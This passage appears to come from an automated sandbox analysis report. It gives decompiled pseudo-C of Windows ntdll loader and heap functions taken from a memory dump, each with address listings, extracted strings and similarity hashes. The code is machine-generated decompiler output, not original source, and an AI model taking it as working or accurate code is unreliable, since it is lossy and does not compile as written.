															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xb65c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00A88A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xb65c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xb65c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00ABF380(_t136, 0xa51184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00A92280(_t108, 0xb686cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00AA61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00B49D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00A8FFB0(_t118, _t156, 0xb686cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00AB9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x00a88799
0x00a8879d
0x00a887a1
0x00a887a3
0x00a887a8
0x00a887c3
0x00a887c3
0x00a887c8
0x00a887d1
0x00a887d4
0x00a887d8
0x00a887e5
0x00a887ec
0x00ad9bfe
0x00ad9c00
0x00ad9c02
0x00ad9c08
0x00ad9c0d
0x00ad9c0f
0x00ad9c14
0x00ad9c2d
0x00ad9c32
0x00ad9c37
0x00ad9c3a
0x00ad9c3c
0x00ad9c42
0x00ad9c42
0x00ad9c3c
0x00ad9c02
0x00a887da
0x00a887df
0x00a887e3
0x00000000
0x00000000
0x00a887e3
0x00a887f2
0x00000000
0x00a887fb
0x00a887fd
0x00a887fe
0x00a8880e
0x00a8880f
0x00a88810
0x00a88814
0x00a8881a
0x00a8881c
0x00a8881f
0x00a88821
0x00a88822
0x00a88824
0x00a88826
0x00a8882c
0x00a8882e
0x00ad9c48
0x00ad9c48
0x00a88834
0x00a88834
0x00a88837
0x00000000
0x00000000
0x00a88837
0x00a8882e
0x00a8883d
0x00a88840
0x00a88843
0x00a88846
0x00a88849
0x00a8884c
0x00a8884e
0x00a88850
0x00a88852
0x00a88854
0x00a88857
0x00a888b4
0x00a888b6
0x00a888b6
0x00a88859
0x00a88859
0x00a88859
0x00a88861
0x00a88866
0x00a8886a
0x00a8893d
0x00a88941
0x00000000
0x00a88947
0x00a88947
0x00a8894a
0x00a8894c
0x00000000
0x00a88952
0x00a88955
0x00a8895a
0x00a8895d
0x00a8895d
0x00a8895f
0x00a88961
0x00a88961
0x00a88968
0x00000000
0x00000000
0x00a8896a
0x00a8896b
0x00a8896e
0x00000000
0x00a88970
0x00a88970
0x00a88970
0x00a88970
0x00a88972
0x00a88972
0x00a88974
0x00000000
0x00a8897a
0x00a8897a
0x00a8897d
0x00000000
0x00a88983
0x00ad9c65
0x00ad9c6d
0x00ad9c72
0x00ad9c75
0x00ad9c75
0x00ad9c82
0x00ad9c86
0x00ad9c87
0x00ad9c88
0x00ad9c89
0x00ad9c8c
0x00ad9c90
0x00ad9c95
0x00ad9c97
0x00ad9ca0
0x00ad9ca3
0x00ad9ca9
0x00ad9ca9
0x00000000
0x00ad9ca9
0x00ad9ca3
0x00000000
0x00ad9c97
0x00a8897d
0x00000000
0x00a88974
0x00a88988
0x00a88992
0x00a88996
0x00000000
0x00a88996
0x00a8894c
0x00000000
0x00a88870
0x00a8887b
0x00a8887d
0x00a8887f
0x00a88881
0x00a88884
0x00a88884
0x00a88886
0x00a88889
0x00a8888c
0x00a8888e
0x00a88891
0x00a88891
0x00a88898
0x00000000
0x00000000
0x00a8889a
0x00a8889b
0x00a8889e
0x00000000
0x00000000
0x00a888a0
0x00a888a8
0x00a888b0
0x00a888b2
0x00a888d3
0x00a888d5
0x00000000
0x00a888d7
0x00a888db
0x00a888dc
0x00a888e0
0x00a888e8
0x00a888ee
0x00a888f0
0x00a888f3
0x00a888fc
0x00a88901
0x00a88906
0x00a8890c
0x00a8890c
0x00a8890f
0x00a88916
0x00a88917
0x00a88918
0x00a88919
0x00a8891a
0x00a8891f
0x00a88921
0x00ad9c52
0x00ad9c55
0x00ad9c5b
0x00ad9cac
0x00ad9cc0
0x00ad9cc0
0x00ad9c55
0x00a88927
0x00a88927
0x00a8892f
0x00a88933
0x00000000
0x00a888f5
0x00a888f5
0x00000000
0x00a888f7
0x00a888f7
0x00a888fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00a888fa
0x00a888f5
0x00a888f3
0x00000000
0x00a888d5
0x00000000
0x00a888b2
0x00a888c9
0x00000000
0x00a888c9
0x00a8887f
0x00a8886a
0x00a88857
0x00a88852
0x00a888bf
0x00a888bf
0x00a887aa
0x00a887ad
0x00a887ae
0x00a887b4
0x00a887b5
0x00a887b6
0x00a887b8
0x00a887bd
0x00a887c1
0x00a887f4
0x00a887fa
0x00000000
0x00000000
0x00000000
0x00a887c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 00AD9C1E
minkernel\ntdll\ldrsnap.c, xrefs: 00AD9C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00AD9C18

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: bb610faa175e40106e4360f44557cfc081649cdeb5535b2977a66cb93ef0251c
Instruction ID: 39906df91ab57eb2db9d0dd7626ea6929868ccdc866e9d48a7fac2f65d3cc4bd
Opcode Fuzzy Hash: bb610faa175e40106e4360f44557cfc081649cdeb5535b2977a66cb93ef0251c
Instruction Fuzzy Hash: F7911571A00216EFDF28EF59C881ABAB7B5FF44350F944169E905AB251EF34ED01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00AAAC7B, Relevance: 4.0, Strings: 3, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00AAAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E00ACD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0xb68a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E00AB96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E00B23C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E00AB96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E00A7B150();
							} else {
								E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E00A7B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E00B314FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E00A97D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E00B31411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E00A97D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E00B31411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}

0x00aaac85
0x00aaac88
0x00aaac8a
0x00aaac8d
0x00aaac91
0x00aaac99
0x00aaac9c
0x00ae9f57
0x00ae9f5b
0x00ae9f60
0x00ae9f60
0x00aaaca8
0x00aaacae
0x00aaacda
0x00aaacde
0x00aaace8
0x00aaaceb
0x00aaacee
0x00000000
0x00aaacee
0x00aaacf6
0x00aaacb0
0x00aaacb0
0x00aaacbb
0x00aaacbd
0x00aaacc0
0x00aaacc5
0x00aaadae
0x00aaadb4
0x00aaadb4
0x00aaacd4
0x00aaacd8
0x00aaacf9
0x00aaacff
0x00aaad04
0x00aaad08
0x00aaad09
0x00aaad10
0x00aaad12
0x00aaad18
0x00ae9f6f
0x00ae9f74
0x00ae9f76
0x00ae9f7c
0x00ae9f84
0x00ae9f88
0x00ae9f89
0x00ae9f90
0x00ae9f90
0x00ae9f76
0x00aaad1e
0x00aaad24
0x00aaad26
0x00aea097
0x00aea09b
0x00aea0ba
0x00aea0bf
0x00aea09d
0x00aea0b2
0x00aea0b7
0x00aea0c5
0x00aea0c8
0x00aea0cb
0x00aea0d2
0x00000000
0x00aaad2c
0x00aaad2c
0x00aaad2f
0x00aaad34
0x00aaad36
0x00ae9f97
0x00ae9f9a
0x00000000
0x00000000
0x00ae9fa9
0x00aaad3e
0x00aaad3e
0x00aaad41
0x00ae9fb3
0x00ae9fb9
0x00ae9fc0
0x00ae9fd0
0x00ae9fd0
0x00ae9fc0
0x00aaad4a
0x00aaad50
0x00aaad5c
0x00aaad62
0x00aaad68
0x00aaad6b
0x00aaad6d
0x00ae9fda
0x00ae9fdd
0x00000000
0x00000000
0x00ae9fec
0x00000000
0x00aaad73
0x00aaad73
0x00aaad73
0x00aaad75
0x00aaad75
0x00aaad78
0x00ae9ff6
0x00ae9ffc
0x00aea003
0x00aea00e
0x00aea010
0x00aea01b
0x00aea01b
0x00aea01b
0x00aea038
0x00aea038
0x00aea003
0x00aaad84
0x00aaad89
0x00aaad8c
0x00aaad8e
0x00aea042
0x00aea045
0x00000000
0x00000000
0x00aea054
0x00000000
0x00aaad94
0x00aaad94
0x00aaad94
0x00aaad96
0x00aaad96
0x00aaad99
0x00aea063
0x00aea065
0x00aea070
0x00aea070
0x00aea070
0x00aea08d
0x00aea08d
0x00aaada4
0x00aaada6
0x00000000
0x00aaada6
0x00aaad8e
0x00aaad6d
0x00aaad3c
0x00aaad3c
0x00000000
0x00aaad3c
0x00000000
0x00000000
0x00000000
0x00aaacd8

Strings

HEAP: , xrefs: 00AEA0BA
HEAP[%wZ]: , xrefs: 00AEA0AD
RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00AEA0CD

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
API String ID: 0-1340214556
Opcode ID: e91a2af721862f6a955fd45802d054cf6a43d1b30c2982faa638c3dab44c149a
Instruction ID: 96787ed8b35a136b216b804ed19955d184204980afdd8e76b2853f03c562a939
Opcode Fuzzy Hash: e91a2af721862f6a955fd45802d054cf6a43d1b30c2982faa638c3dab44c149a
Instruction Fuzzy Hash: 04812531200684EFD726CBA8C984BAABBF8FF16710F1445A5E5818B6D2D734ED40CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00A9B73D, Relevance: 3.9, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00A9B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E00B3A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0xb68748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E00A7B150();
					} else {
						E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E00A7B150();
					__eflags =  *0xb67bc8;
					if(__eflags == 0) {
						E00B32073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E00B3A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0xb68720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0xb68720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E00A9B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E00B3A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E00A9E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x00a9b746
0x00a9b74b
0x00a9b74d
0x00a9b750
0x00a9b755
0x00a9b758
0x00a9b758
0x00a9b75e
0x00a9b763
0x00a9b764
0x00a9b76a
0x00a9b76d
0x00a9b771
0x00a9b776
0x00a9b85c
0x00a9b85d
0x00a9b860
0x00a9b865
0x00ae2ba1
0x00ae2ba2
0x00ae2ba9
0x00ae2bae
0x00ae2bae
0x00a9b77c
0x00a9b77c
0x00a9b77c
0x00a9b785
0x00a9b788
0x00ae2bb6
0x00ae2bb9
0x00000000
0x00000000
0x00ae2bbf
0x00ae2bc5
0x00ae2bc9
0x00ae2be8
0x00ae2bed
0x00ae2bcb
0x00ae2be0
0x00ae2be5
0x00ae2bf3
0x00ae2bf8
0x00ae2bfd
0x00ae2c05
0x00ae2c0e
0x00ae2c0e
0x00000000
0x00a9b78e
0x00a9b78e
0x00a9b78e
0x00a9b791
0x00a9b791
0x00a9b797
0x00a9b797
0x00a9b79f
0x00a9b7a9
0x00a9b7af
0x00a9b7af
0x00a9b7b1
0x00a9b7b6
0x00a9b7e2
0x00a9b7e2
0x00a9b7e7
0x00a9b880
0x00a9b7ed
0x00a9b7ed
0x00a9b7ed
0x00a9b7ef
0x00a9b7f2
0x00a9b7f2
0x00a9b7f5
0x00a9b7fa
0x00ae2c2d
0x00ae2c2e
0x00ae2c39
0x00a9b800
0x00a9b800
0x00a9b802
0x00a9b805
0x00a9b808
0x00a9b808
0x00a9b80a
0x00a9b80d
0x00a9b816
0x00a9b81c
0x00a9b822
0x00a9b82f
0x00a9b88b
0x00a9b892
0x00a9b897
0x00a9b899
0x00a9b89b
0x00a9b89e
0x00a9b8a5
0x00a9b8a8
0x00a9b8aa
0x00a9b8ac
0x00a9b8ac
0x00a9b8aa
0x00a9b892
0x00a9b831
0x00a9b839
0x00a9b83b
0x00a9b83b
0x00a9b844
0x00a9b84b
0x00a9b852
0x00a9b7b8
0x00a9b7ba
0x00a9b7bf
0x00a9b7c4
0x00ae2c18
0x00ae2c19
0x00ae2c23
0x00a9b7ca
0x00a9b7ca
0x00a9b7cc
0x00a9b7cf
0x00a9b7d1
0x00a9b7d1
0x00a9b7d4
0x00a9b7dc
0x00a9b8bb
0x00a9b8bb
0x00a9b8be
0x00a9b8be
0x00a9b8c1
0x00000000
0x00000000
0x00a9b8c3
0x00a9b8c5
0x00a9b8c7
0x00a9b8e0
0x00000000
0x00a9b8e0
0x00a9b8cc
0x00a9b8cc
0x00000000
0x00a9b8cc
0x00a9b8d6
0x00a9b8d6
0x00000000
0x00a9b7dc
0x00a9b7b6

Strings

HEAP: , xrefs: 00AE2BE8
((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 00AE2BF3
HEAP[%wZ]: , xrefs: 00AE2BDB

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 230d8ce2592e8f54f42883557a9e6c565fb5721d1330447b04f69b71e5c3099f
Instruction ID: a0027c2c190f881e73ec2c31a2aa71ddb7b4d2a8b9db9677b030e908d9a5e712
Opcode Fuzzy Hash: 230d8ce2592e8f54f42883557a9e6c565fb5721d1330447b04f69b71e5c3099f
Instruction Fuzzy Hash: 2C619F70710245DFDB18DF64DA85B6ABBF5FF48304F24C669E8498B291D770E881CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A87E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00A87E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00A8CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00A7C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xb65780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00AF5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xb65780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00A97D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00A97D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00AF7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00A97D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00A97D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00AF7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
